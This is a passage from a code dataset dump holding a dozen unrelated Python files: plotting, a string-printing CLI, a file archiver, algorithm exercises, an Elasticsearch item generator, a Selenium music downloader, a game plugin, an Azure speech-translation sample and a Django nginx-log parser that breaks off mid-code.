((t-t0)/(n))*(nFrames-n)\n ETAh = ETA/3600\n ETAm = (ETAh%1)*60\n ETAs = (ETAm%1)*60\n k = 100*n/nFrames\n sys.stdout.write(\"\\rGenerating heatmap %d%%, ETA: %dh %dm %ds\" % (k, ETAh, ETAm, ETAs))\n sys.stdout.flush()\n for i in range(0,windowlength):\n if i+crossing-leftside<1029:\n if max(frame.samples[n])uplim):\n continue\n else:\n heatMap[i][int(frame.samples[n][i+crossing-leftside])] += 1\n\n\n heatMap=np.rot90(heatMap, k=-1, axes=(0,1))\n heatMap=np.fliplr(heatMap)\n #We want all the zero valued bins to be depicted as black. 
It is easier to look at.\n #heat map with Zeroes boosted to 0.01\n heatmapZboost=heatMap[:][:]\n for u in range(0,uplim):\n #print('u = ', u)\n for y in range(0,windowlength):\n #print('y = ', y)\n if heatmapZboost[u][y] < 1:\n heatmapZboost[u][y] = 0.01\n\n plt.imshow(heatmapZboost[1:uplim],cmap='gnuplot',aspect='auto', norm=LogNorm(vmin=0.01, vmax=15000), interpolation='nearest',origin = 'lower')\n #for i in range(50, 70):\n # plt.plot(frame.samples[i][frame.refpoint[i]-leftside:frame.refpoint[i]+windowlength-leftside])\n \n plt.xlabel('Time ns')\n plt.ylabel('ADC value')\n clb = plt.colorbar()\n clb.ax.set_title('Counts')\n plt.axvline(50)\n plt.show()\n tf = time.time()\n print('\\n runtime = ', tf-t0)\n return heatMap, heatmapZboost\n","sub_path":"heatmapper.py","file_name":"heatmapper.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"385904259","text":"import sys\n\n'''\nThis module is print function package to decoration for string\n'''\n\nclass ZeroIndexError(Exception):\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return self.msg\n\nclass OverIndexError(Exception):\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return self.msg\n\nclass CheckIndex:\n def __init__(self, index, l_list):\n self.index = index\n self.l_list = l_list\n def check(self):\n if self.index <=0:\n raise ZeroIndexError(\"ZeroIndexError: should input over zero. Plese check index\")\n if self.index > len(self.l_list):\n raise OverIndexError(\"OverIndexError: list index out of range\")\n\ndef print_with_ab(string):\n \"\"\"\n This is a function to print asterisk border line around the string\n \"\"\"\n print('*'* (len(string) + 4))\n print('* ' + string + ' *')\n print('*'* (len(string) + 4))\n\ndef print_with_dlb(string):\n \"\"\"\n This is a function to print double line border line around the string\n \"\"\"\n print('='* (len(string) + 4))\n print('= ' + string + ' =')\n print('='* (len(string) + 4))\n\ndef print_list_value(s, index=None):\n \"\"\"\n This is a fucntion to find string value and index number in the string\n \"\"\"\n str_list = s.split()\n if index != None:\n try:\n CheckIndex(index, str_list).check()\n if index == 1:\n print(f'The {index}st value is \" {str_list[index-1]} \"')\n elif index == 2:\n print(f'The {index}nd value is \" {str_list[index-1]} \"')\n else:\n print(f'The {index}th value is \" {str_list[index-1]} \"')\n except ZeroIndexError as e:\n print(e); exit()\n except OverIndexError as e:\n print(e); exit()\n \n else:\n index = 0\n for val in str_list:\n if index == 0:\n print(f'[ {val} ] is the {index+1}st value in string')\n elif index == 1:\n print(f'[ {val} ] is the {index+1}nd value in string')\n else:\n print(f'[ {val} ] is the {index+1}th value in string')\n index = index + 1\n\nif __name__ == '__main__':\n l = len(sys.argv)-1\n s = sys.argv[1]\n functions = {'-a': print_with_ab, '-d': print_with_dlb,'-s': print_list_value}\n if l == 1:\n print(s) \n elif l == 2:\n opt = sys.argv[2]\n if opt == '-a' or opt =='-d' or opt =='-s':\n opt = sys.argv[2]\n func = functions[opt]\n func(s)\n else:\n func = functions['-a']\n func(s)\n else:\n func = functions['-s']\n func(s, int(sys.argv[3]))","sub_path":"string_print.py","file_name":"string_print.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"537925150","text":"\"\"\"\nThis standalone module 
looks for all the unique MDRs in the /var/opt/gmc/gliders directory and saves them with a unique, timastamp name in a local directory\nThis module intended to be run on server (no sftp capabilities) with manual involvement\n\n#1 walk the /var/opt/gmc/gliders directory and collect all the fullpaths of files ending in .mdr\n#2 orgnize them by node number and then order by time\n#3 open content of each file from part1, compare with local content, if all different, save it\n\n\"\"\"\nimport os\nimport time\n\nmdr_archive = {}\nmdr_from_gmc = {}\n#rootpath = '/var/opt/gmc/gliders'\n#rootpath = '/home/gmc/gliders'\nsrc = 'mdr_pileup'\ndest = 'mdr_archive'\n\n# get all foreign mdr's\nfor fname in os.listdir(src):\n fullpath = os.path.join(src,fname)\n if len(fname)==6:\n fname = time.strftime('%Y%m%dT%H%M%S_',time.gmtime())+fname\n else:\n node = fname[-6:-4] #node number always the 2 characters before '.mdr' extn\n try: mdr_from_gmc[node]\n except: \n mdr_from_gmc[node] = []\n mdr_archive[node] = []\n with open(fullpath) as f:\n mdr_from_gmc[node].append( (fname, f.read()) )\n\n#compare foreign mdrs with archived ones\nfor node in mdr_from_gmc:\n mdr_from_gmc[node].sort(key=lambda tup: tup[0])\n for mdr_tup in mdr_from_gmc[node]:\n # if content of this mdr file not in the archive, add the mdr to the archive\n if mdr_tup[1] not in [mdr_arch_tup[1] for mdr_arch_tup in mdr_archive[node]]:\n mdr_archive[node].append(mdr_tup)\n\n#write mdr's to archive\nfor node in mdr_archive:\n for mdr_tup in mdr_archive[node]:\n fullpath = os.path.join(dest,mdr_tup[0]) \n with open(fullpath,'w') as f:\n f.write(mdr_tup[1])","sub_path":"gliderops/report/aggregate_mdr.py","file_name":"aggregate_mdr.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201058712","text":"'''\nTime Complexity: O(n)\nSpace Complexity:O(n)\nDid this code successfully run on Leetcode : Yes\nExplanation: Create a stack of indexes - the stack contains all indexes of the next greater element value whose max\nwe don't know, if the temperature value of the ith element is greater than the top of the stack value then this is the\nnew maximum, so pop all the values which are in the stack which have a value less than\nthe current value and update their max in the result array. 
For the nth element we do another pass around the array\nto find its next largest element.\n'''\n\nclass Solution:\n def nextGreaterElements(self, nums: List[int]) -> List[int]:\n if nums == None or len(nums) == 0:\n return []\n\n res = [-1 for i in range(len(nums))]\n stack = []\n n = len(nums)\n for index in range(0, 2 * n):\n while len(stack) != 0 and nums[index % n] > nums[stack[-1]]:\n priorIndex = stack.pop()\n res[priorIndex] = nums[index % n]\n\n # as you need to do this only for 1 pass\n if index < n:\n stack.append(index % n)\n\n return res\n\n","sub_path":"nextGreaterElement.py","file_name":"nextGreaterElement.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"179209974","text":"def has_cblas(self, info):\n res = False\n c = distutils.ccompiler.new_compiler()\n tmpdir = tempfile.mkdtemp()\n s = '#include \\n int main(int argc, const char *argv[])\\n {\\n double a[4] = {1,2,3,4};\\n double b[4] = {5,6,7,8};\\n return cblas_ddot(4, a, 1, b, 1) > 10;\\n }'\n src = os.path.join(tmpdir, 'source.c')\n try:\n with open(src, 'wt') as f:\n f.write(s)\n try:\n obj = c.compile([src], output_dir=tmpdir, include_dirs=self.get_include_dirs())\n try:\n c.link_executable(obj, os.path.join(tmpdir, 'a.out'), libraries=['cblas'], library_dirs=info['library_dirs'], extra_postargs=info.get('extra_link_args', []))\n res = 'cblas'\n except distutils.ccompiler.LinkError:\n c.link_executable(obj, os.path.join(tmpdir, 'a.out'), libraries=['blas'], library_dirs=info['library_dirs'], extra_postargs=info.get('extra_link_args', []))\n res = 'blas'\n except distutils.ccompiler.CompileError:\n res = None\n finally:\n shutil.rmtree(tmpdir)\n return res","sub_path":"Data Set/bug-fixing-5/730af6f800d7e9b57ae7a2233aa7ca563603c960--bug.py","file_name":"730af6f800d7e9b57ae7a2233aa7ca563603c960--bug.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"408606982","text":"import elasticsearch as es\nimport json\n\nclient = es.Elasticsearch(\"220.69.209.17:9200\")\ndoc = client.get(index = 'test', doc_type = '0001', id='board')\n\nerror = True\noverlap = False\n\n#에러체크\n\n#우선, 아이템에 중복된 내용이 있는가 체크. 
폴더 검사\n\n\n#items 생성시켜줄 정보\nif error:\n j = doc[\"_source\"]\n\n snode = \"String snode \\\"위치[\" + j[\"snode\"] + \"]\\\"\\n\"\n uid = \"String uid \\\"Uid[\" + j[\"uid\"] + \"]\\\"\\n\"\n name = \"String name \\\"센서명[\" + j[\"name\"] + \"]\\\"\\n\"\n date = \"String date \\\"등록날짜[\" + j[\"date\"] + \"]\\\"\\n\" \n user_id = \"String user_id \\\"사용자 ID[\" + j[\"user_id\"] + \"]\\\"\\n\"\n gps_lat = \"String gps_lat \\\"위도[\" + str(j[\"gps:lat\"]) + \"]\\\"\\n\"\n gps_lon = \"String gps_lon \\\"경도[\" + str(j[\"gps:lon\"]) + \"]\\\"\" \n state = \"String state \\\"단말 정보\\\"\"\n\n send = state + snode + uid + name + date + user_id + gps_lat + gps_lon\n\n #sitemap 추가시켜줄 정보\n snode_s = \"Text item=snode\"\n uid_s = \"Text item=uid\"\n name = \"Text item=name\"\n date = \"Text item=date\"\n user_id_s = \"Text item=user_id\"\n gps_lat_s = \"Text item=gps_lat\"\n gps_lon_s = \"Text item=gps_lon\"\n state_s =\"Text item=state\"\n\n send_s = \"\\tFrame label=\\\"단말정보\\\"\\n\\t\\t\" + state_s + \"{\\n\\t\\t\\t\" + uid_s + \"\\n\\t\\t\\t\" + name + \"\\n\\t\\t\\t\" + date + \"\\n\\t\\t\\t\" + user_id_s + \"\\n\\t\\t\\t\" + gps_lat_s + \"\\n\\t\\t\\t\" + gps_lon_s + \"\\n\\t\\t}\\n\\t}\"\n\n #with open(\"/etc/openhab2/items/\" + j[\"uid\"], \"w\") as items:\n # items.write(send)\n \n\n print(send)\n print(send_s)\n","sub_path":"교내,대외활동/임산업용 IoT 네트워크 모듈 개발/2018_10_08/이전 코드/이전 이전 코드/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"46705834","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport csv\n#from tensorflow.examples.tutorials.mnist import input_data\n\n#mnist = input_data.read_data_sets(\"input/data\", one_hot=True)\n\ndef donnees():\n #with open('gout.csv', 'rt') as csvfile:\n #spamreader = csv.reader(csvfile, delimiter=';', quotechar='|')\n\n #for row in spamreader:\n #print(', '.join(row))\n #return \"a\"\n result = np.loadtxt(open(\"carte2.csv\", \"rb\"), delimiter=\",\", skiprows=1)\n #x = list(reader)\n #result = np.array(x).astype(\"float\")\n return result\n\ntriplets = []\nmatrice = donnees()\nfor i in range(0, 40):\n\tj = 0\n\tfor el in matrice[i]:\n\t\tprint(int(matrice[i][j]), int(matrice[i+39][j]), int(matrice[i+79][j]))\n\t\tj = j + 1\n\t","sub_path":"Entrainement/cartes/carte_association_regle.py","file_name":"carte_association_regle.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"565366263","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n# boundary traversal of a given binary tree\n\n# left boundary + all the leaf nodes + right boundary\ndef printBoundary(root):\n result = []\n if (root):\n result.append(root.data)\n printBoundaryLeft(root.left, result)\n print(root.data)\n # print leaves starting from the root node\n printLeaves(root, result)\n #printLeaves(root.right, result)\n print(root.data)\n printBoundaryRight(root.right, result)\n return result\n\n\ndef printBoundaryLeft(root, result):\n\n if(root):\n if (root.left):\n result.append(root.data)\n #print(result)\n printBoundaryLeft(root.left, result)\n elif(root.right):\n result.append(root.data)\n printBoundaryLeft(root.right, result)\n\n\ndef printLeaves(root, result):\n\tif not root:\n\t\treturn\n\tif not root.left and not 
root.right:\n\t\tresult.append(root.data)\n\t#print(result)\n\tprintLeaves(root.left, result)\n\tprintLeaves(root.right, result)\n\n\ndef printBoundaryRight(root, result):\n if(root):\n if (root.right):\n printBoundaryRight(root.right, result)\n result.append(root.data)\n #print(result)\n elif(root.left):\n printBoundaryRight(root.left, result)\n result.append(root.data)\n\n\n# Driver program to test above function\nroot = Node(20)\nroot.left = Node(8)\nroot.left.left = Node(4)\nroot.left.right = Node(12)\nroot.left.right.left = Node(10)\nroot.left.right.right = Node(14)\nroot.right = Node(22)\nroot.right.left = Node(21)\nroot.right.right = Node(25)\nprint(printBoundary(root))\n\n\n# def boundary_BT(root):\n# if not root:\n# return\n\n# result = []\n# if root.left or root.right:\n# result.append(root.val)\n\n# leftBoundary(root.left, result)\n# leaves(root, result)\n# rightBoundary(root.right, result)\n\n\n# def leftBoundary(root, result):\n# # Is a leaf node so return\n# if not root or (not root.left and not root.right):\n# return\n# result.append(root.val)\n# if not root.left:\n# leftBoundary(root.right, result)\n# else:\n# leftBoundary(root.left, result)\n\n\n# def leaves(root, result):\n# if not root:\n# return\n# if not root.left and not root.right:\n# result.append(root.val)\n# leaves(root.left, result)\n# leaves(root.right, result)\n\n\n# def rightBoundary(root, result):\n# pass\n","sub_path":"IK/Trees/BoundaryBinaryTree.py","file_name":"BoundaryBinaryTree.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"620346665","text":"import logging\r\nimport time\r\n\r\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.remote.remote_connection import LOGGER\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\n\r\nLOGGER.setLevel(logging.WARNING)\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(filename=\"failed_songs.log\", level=logging.DEBUG)\r\n\r\n# MP3_CONVERTER\r\nENTER_SONG_NAME = \"\"\"document.getElementById(\"youtube-url\").value=\"{}\";\"\"\"\r\nSUBMIT_SONG = \"\"\"document.getElementById(\"submit\").click();\"\"\"\r\nPRESS_DOWNLOAD = \"\"\"for(child in document.getElementById(\"dl_link\").childNodes)if (document.getElementById(\"dl_link\").childNodes.hasOwnProperty(child))if(document.getElementById(\"dl_link\").childNodes[child].style.display==\"\"){document.getElementById(\"dl_link\").childNodes[child].click();break;}\"\"\"\r\n\r\n# CONVERTER2MP3\r\nINSERT_SONG_NAME = \"\"\"document.getElementById(\"urlinput\").value=\"{}\";\"\"\"\r\nCONVERT_SONG = \"\"\"document.getElementsByTagName(\"button\")[1].click();\"\"\"\r\nSKIP_TAGS = \"\"\"document.getElementsByTagName(\"a\")[12].click();\"\"\"\r\nDOWNLOAD_SONG = \"\"\"document.getElementsByTagName(\"a\")[9].click();\"\"\"\r\nCONVERT_NEXT = \"\"\"document.getElementsByTagName(\"span\")[0].click();\"\"\"\r\n\r\n\r\ndef download_mp3_converter(driver, song):\r\n driver.execute_script(ENTER_SONG_NAME.format(song))\r\n driver.execute_script(SUBMIT_SONG)\r\n WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.ID, \"dl_link\")))\r\n driver.execute_script(PRESS_DOWNLOAD)\r\n\r\n\r\ndef download_converter2mp3(driver, song):\r\n def execute(web_driver, command):\r\n web_driver.execute_script(command)\r\n time.sleep(3)\r\n\r\n 
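 # the URL is filled in and conversion started with direct JS calls; the
 # remaining buttons go through execute() so each click gets a 3-second
 # settle time before the next step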
driver.execute_script(INSERT_SONG_NAME.format(song))\r\n driver.execute_script(CONVERT_SONG)\r\n WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.ID, \"advancedtags_btn\")))\r\n execute(driver, SKIP_TAGS)\r\n execute(driver, DOWNLOAD_SONG)\r\n execute(driver, CONVERT_NEXT)\r\n\r\n\r\nDOWNLOAD_FUNCTIONS = {\"1\": download_converter2mp3, \"2\": download_mp3_converter}\r\n\r\n\r\ndef downloader(driver, mode, songs_list):\r\n download_song = DOWNLOAD_FUNCTIONS[mode]\r\n with open(songs_list, \"r\", encoding=\"utf-8-sig\") as songs:\r\n for song in songs:\r\n try:\r\n download_song(driver, song.strip(\"\\n\"))\r\n except (TimeoutException, NoSuchElementException):\r\n logger.warning(\" Failed to download: \" + song.strip(\"\\n\"))\r\n","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"209082727","text":"import sys\nfrom collections import deque\nq = deque()\nres = []\nfor tmp in sys.stdin.read().splitlines():\n tmp = tmp.split()\n if tmp[0][-1]=='h':\n q.append(tmp[1])\n elif tmp[0][0]=='f':\n res.append(q[0] if q else '-1')\n elif tmp[0][-1]=='p':\n res.append(q.popleft() if q else '-1')\n elif tmp[0][0]=='s':\n res.append(str(len(q)))\n elif tmp[0][0]=='e':\n res.append('0' if q else '1')\n elif tmp[0][0]=='b':\n res.append(q[-1] if q else '-1')\nprint('\\n'.join(res)) ","sub_path":"algo_py/boj/bj18258.py","file_name":"bj18258.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"256912727","text":"# blockBox is copyright 2009-2011 the Archives Team, the blockBox Team, and the iCraft team.\r\n# blockBox is licensed under the Creative Commons by-nc-sa 3.0 UnPorted License.\r\n# To view more details, please see the \"LICENSING\" file in the \"docs\" folder of the blockBox Package.\r\n\r\nfrom blockbox.constants import *\r\nfrom blockbox.decorators import *\r\nfrom blockbox.plugins import ProtocolPlugin\r\n\r\nclass AdminBlocksPlugin(ProtocolPlugin):\r\n\t\"Commands for toggling admincrete options on-off.\"\r\n\r\n\tcommands = {\r\n\t\t\"solid\": \"commandSolid\",\r\n\t}\r\n\r\n\thooks = {\r\n\t\t\"blockchange\": \"blockChanged\",\r\n\t\t\"rankchange\": \"sendAdminBlockUpdate\",\r\n\t\t\"canbreakadmin\": \"canBreakAdminBlocks\",\r\n\t}\r\n\r\n\tdef gotClient(self):\r\n\t\tself.building_solid = False\r\n\r\n\tdef sendAdminBlockUpdate(self):\r\n\t\t\"Sends a packet that updates the client's admin-building ability\"\r\n\t\tself.client.sendPacked(TYPE_INITIAL, 6, \"Admincrete Update\", \"Reloading the server...\", self.canBreakAdminBlocks() and 100 or 0)\r\n\r\n\tdef blockChanged(self, x, y, z, block, selected_block, fromloc):\r\n\t\t\"Hook trigger for block changes.\"\r\n\t\t# Admincrete hack check\r\n\t\tif not self.canBreakAdminBlocks():\r\n\t\t\tdef check_block(block):\r\n\t\t\t\tif ord(block) == BLOCK_GROUND_ROCK:\r\n\t\t\t\t\tself.client.sendError(\"Don't build admincrete!\")\r\n\t\t\t\t\tself.client.world[x, y, z] = chr(BLOCK_AIR)\r\n\t\t\tself.client.world[x,y,z].addCallback(check_block)\r\n\t\t# See if they are in solid-building mode\r\n\t\tif self.building_solid and block == BLOCK_ROCK:\r\n\t\t\treturn BLOCK_GROUND_ROCK\r\n\r\n\tdef canBreakAdminBlocks(self):\r\n\t\t\"Shortcut for checking permissions.\"\r\n\t\tif hasattr(self.client, \"world\"):\r\n\t\t\treturn (not self.client.world.admin_blocks) or 
self.client.isOp()\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\t@build_list\r\n\t@op_only\r\n\tdef commandSolid(self, parts, fromloc, overriderank):\r\n\t\t\"/solid - Op\\nToggles admincrete creation.\"\r\n\t\tif self.building_solid:\r\n\t\t\tself.client.sendServerMessage(\"You are now placing normal rock.\")\r\n\t\telse:\r\n\t\t\tself.client.sendServerMessage(\"You are now placing admin rock.\")\r\n\t\tself.building_solid = not self.building_solid","sub_path":"blockbox/plugins/solids.py","file_name":"solids.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"432046335","text":"\"\"\"\r\nlist: 可变数据类型, 类似于C++中的vector\r\n\"\"\"\r\n\r\n'''\r\n增\r\n'''\r\n# + append extend insert\r\narr = [9, 5, 2, 7]\r\nprint(arr + arr)\r\narr.append(12) # 追加1个对象\r\nprint(arr)\r\nright = [13, 99]\r\narr.extend(right) # 添加多个对象\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.insert(1, 100)\r\nprint(arr)\r\n\r\n'''\r\n删\r\n'''\r\n# del[index] pop(index=-1) remove clear\r\narr = [9, 5, 2, 7]\r\ndel arr[1]\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.pop()\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.remove(2)\r\nprint(arr)\r\narr.clear()\r\nprint(arr)\r\n\r\n'''\r\n改\r\n'''\r\n# [index]\r\narr = [9, 5, 2, 7]\r\narr[1] = 13\r\nprint(arr)\r\n# sort(key=None, reverse=False)\r\n# key, reverse 想当于c++中的仿函数\r\narr = [9, 5, 2, 7]\r\narr.sort()\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.sort(reverse=True)\r\nprint(arr)\r\n\r\n\r\ndef mysort(val):\r\n return val[1]\r\n\r\n\r\narr = [(1, 2), (2, 4), (2, 3), (5, 0)]\r\narr.sort(key=mysort)\r\nprint(arr)\r\n# reverse\r\narr = [9, 5, 2, 7]\r\narr.reverse()\r\nprint(arr)\r\n\r\n'''\r\n查\r\n'''\r\n# [index] index count\r\narr = [9, 5, 2, 7]\r\nindex = arr.index(5)\r\nprint(index)\r\ncount = arr.count(9)\r\nprint(count)\r\n# [start:end:step] 切片\r\narr = [9, 5, 2, 7]\r\nprint(arr[-1::-1]) # arr.reverse()\r\nprint(arr[1:len(arr)]) # 左闭右开\r\nprint(arr[::2])\r\n\r\n# copy 拷贝一份, id不同\r\narr = [9, 5, 2, 7]\r\nnewarr = arr.copy()\r\nprint(id(arr))\r\nprint(id(newarr))\r\n","sub_path":"Python/TypeAndOper/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"565457984","text":"import azure.cognitiveservices.speech as speechsdk\nfrom azure.cognitiveservices.speech.translation import TranslationSynthesisResult\n\n########### CONFIGURTATION #####\nSTORE_TO_FILE = 1\nfolderPath = '/Users/mayankgupta/Projects/TTB/AzureCognitiveServices/Results/'\nfileName = 'KhanAcademyLinearAlgebratranslate_hindi.txt' #'KhanAcademyLinearAlgebra' #'3blue1brown-channel-trailer'\n\n# Creates an instance of a speech config with specified subscription key and service region.\n# Replace with your own subscription key and service region (e.g., \"westus\").\nwith open('/Users/mayankgupta/Projects/TTB/AzureCognitiveServices/key.txt', 'r') as f:\n speech_key = f.readline().rstrip()\nservice_region = \"eastus\"\n#########\n\ndef translate_speech_to_speech():\n\n # Creates an instance of a speech translation config with specified subscription key and service region.\n # Replace with your own subscription key and region identifier from here: https://aka.ms/speech/sdkregion\n translation_config = speechsdk.translation.SpeechTranslationConfig(subscription=speech_key, region=service_region)\n\n # Sets source and target languages.\n # Replace with the languages of your choice, from list found here: 
https://aka.ms/speech/sttt-languages\n fromLanguage = 'en-US'\n toLanguage = 'hi-IN'\n translation_config.speech_recognition_language = fromLanguage\n translation_config.add_target_language(toLanguage)\n\n # Sets the synthesis output voice name.\n # Replace with the languages of your choice, from list found here: https://aka.ms/speech/tts-languages\n translation_config.voice_name = \"de-DE-Hedda\"\n # Creates an audio configuration that points to an audio file.\n # Replace with your own audio filename.\n audio_filename = \"Results/KhanAcademyLinearAlgebra.wav\"\n audio_input = speechsdk.audio.AudioOutputConfig(filename=audio_filename)\n\n # Creates a translation recognizer using and audio file as input.\n recognizer = speechsdk.translation.TranslationRecognizer(translation_config=translation_config, audio_config=audio_input)\n\n # Prepare to handle the synthesized audio data.\n def synthesis_callback(evt):\n size = len(evt.result.audio)\n\n if evt.result.reason == speechsdk.ResultReason.SynthesizingAudio:\n print('writing to wav file!!!')\n try:\n with open(f\"out_{size}.wav\", 'wb') as wavfile:\n wavfile.write(evt.result.audio)\n except Exception as e:\n print(f'could not write to file: {e}')\n\n print('AUDIO SYNTHESIZED: {} byte(s) {}'.format(size, '(COMPLETED)' if size == 0 else ''))\n\n recognizer.synthesizing.connect(synthesis_callback)\n\n # Starts translation, and returns after a single utterance is recognized. The end of a\n # single utterance is determined by listening for silence at the end or until a maximum of 15\n # seconds of audio is processed. It returns the recognized text as well as the translation.\n # Note: Since recognize_once() returns only a single utterance, it is suitable only for single\n # shot recognition like command or query.\n # For long-running multi-utterance recognition, use start_continuous_recognition() instead.\n print(\"Say something...\")\n result = recognizer.recognize_once()\n\n # Check the result\n if result.reason == speechsdk.ResultReason.TranslatedSpeech:\n print(\"RECOGNIZED '{}': {}\".format(fromLanguage, result.text))\n print(\"TRANSLATED into {}: {}\".format(toLanguage, result.translations['hi']))\n elif result.reason == speechsdk.ResultReason.RecognizedSpeech:\n print(\"RECOGNIZED: {} (text could not be translated)\".format(result.text))\n elif result.reason == speechsdk.ResultReason.NoMatch:\n print(\"NOMATCH: Speech could not be recognized: {}\".format(result.no_match_details))\n elif result.reason == speechsdk.ResultReason.Canceled:\n print(\"CANCELED: Reason={}\".format(result.cancellation_details.reason))\n if result.cancellation_details.reason == speechsdk.CancellationReason.Error:\n print(\"CANCELED: ErrorDetails={}\".format(result.cancellation_details.error_details))\n\ntranslate_speech_to_speech()","sub_path":"speech-translation/Python/SpeechToSpeech.py","file_name":"SpeechToSpeech.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"111619564","text":"from django.shortcuts import render, redirect\nfrom dashboard.models import LogsHolder, error_logs\nfrom .models import daily_bandwidth\nimport pandas as pd\nimport re\nimport glob\nfrom xopen import xopen\nimport shutil\nimport os\nimport time\nfrom datetime import datetime\nfrom time import strptime\n\n\n# Create your views here.\ndef index(request):\n flag = 0\n if request.method == 'POST':\n request.session['source'] = request.POST.get('source')\n source = request.POST.get('source')\n 
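 # the submitted log directory is stored in the session; the later reads
 # (the existence check and source_dir below) go through request.session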
print(request.session.get('source'))\n if os.path.exists(str(request.session.get('source'))):\n flag = 0\n start_time = time.time()\n # Insert data from log into database\n source_dir = request.session['source']\n if os.path.exists(source_dir):\n files = glob.iglob(os.path.join(source_dir, \"access.log.*.gz\"))\n\n for i in files:\n with xopen(i, 'rb') as f_in:\n with open(i + '.log', 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n else:\n print(\"IOError: [Errno 2] No such file or directory: '\" + source_dir + \"'\")\n\n hourly = {'00': 0, '01': 0, '02': 0, '03': 0, '04': 0, '05': 0, '06': 0, '07': 0, '08': 0, '09': 0, '10': 0,\n '11': 0, '12': 0, '13': 0, '14': 0, '15': 0, '16': 0, '17': 0, '18': 0, '19': 0, '20': 0, '21': 0,\n '22': 0, '23': 0}\n tangent = 0\n conf = '$remote_addr - $remote_user [$time_local] \"$request\" $status $body_bytes_sent \"$http_referer\" \"$http_user_agent\"'\n regex = ''.join(\n '(?P<' + g + '>.*?)' if g else re.escape(c)\n for g, c in re.findall(r'\\$(\\w+)|(.)', conf))\n\n files = glob.iglob(os.path.join(source_dir, \"access.log.*.gz.log\"))\n\n for filepath in files:\n\n raw_data = open(filepath, \"r\", encoding=\"utf8\")\n authorizedusers = []\n\n for idx, i in enumerate(raw_data):\n m = re.match(regex, i)\n\n # Find the authorized users\n authorized = re.findall('(.*\\d) - - .*POST.*200 \\d{1,}', i)\n if len(authorized):\n authorizedip = str(authorized[0])\n if authorizedip not in authorizedusers:\n authorizedusers.append(authorizedip)\n\n # Temp Area\n\n # print(authorizedusers)\n # temp = LogsHolder.objects.filter(authorizedUser = True).distinct()\n # for i in temp:\n # if i.remoteAddr in authorizedusers:\n # print(\"True\")\n\n # Temp Area\n\n payload = m.groupdict()\n # 'daily bandwidth\n\n print(hourly)\n data = LogsHolder()\n data.remoteAddr = payload['remote_addr']\n data.remoteUser = payload['remote_user']\n\n # Convert time in logformat to time in python datetime format and store it in db\n timeLocalstr = str(payload['time_local'])\n timeLocal = datetime.strptime(timeLocalstr, '%d/%b/%Y:%H:%M:%S %z')\n timeLocal = timeLocal.replace(tzinfo=None)\n data.timeLocal = timeLocal\n\n data.request = payload['request']\n data.status = payload['status']\n data.bodyBytesSent = payload['body_bytes_sent']\n data.httpReferer = payload['http_referer']\n data.httpUserAgent = payload['http_user_agent']\n\n # Check and add the authorized column value\n if str(payload['remote_addr']) in authorizedusers:\n data.authorizedUser = True\n else:\n data.authorizedUser = False\n\n if (LogsHolder.objects.filter(remoteAddr=payload['remote_addr'], remoteUser=payload['remote_user'],\n timeLocal=timeLocal, request=payload['request'],\n status=payload['status'], bodyBytesSent=payload['body_bytes_sent'],\n httpReferer=payload['http_referer'],\n httpUserAgent=payload['http_user_agent']).count() == 0):\n data.save()\n tangent = 1\n hourly[payload['time_local'].split(\":\")[1]] += int(payload['body_bytes_sent'])\n\n # ' error log storing in db'\n conf = \"$date $time [$level] $pid#$tid: '$message'\"\n regex = ''.join(\n '(?P<' + g + '>.*?)' if g else re.escape(c)\n for g, c in re.findall(r'\\$(\\w+)|(.)', conf))\n\n files = glob.iglob(os.path.join(source_dir, \"error.log\"))\n\n for filepath in files:\n\n raw_data = open(filepath, \"r\", encoding=\"utf8\")\n for idx, i in enumerate(raw_data):\n m = re.match(regex, i)\n errorlog = m.groupdict()\n data = error_logs()\n data.date = 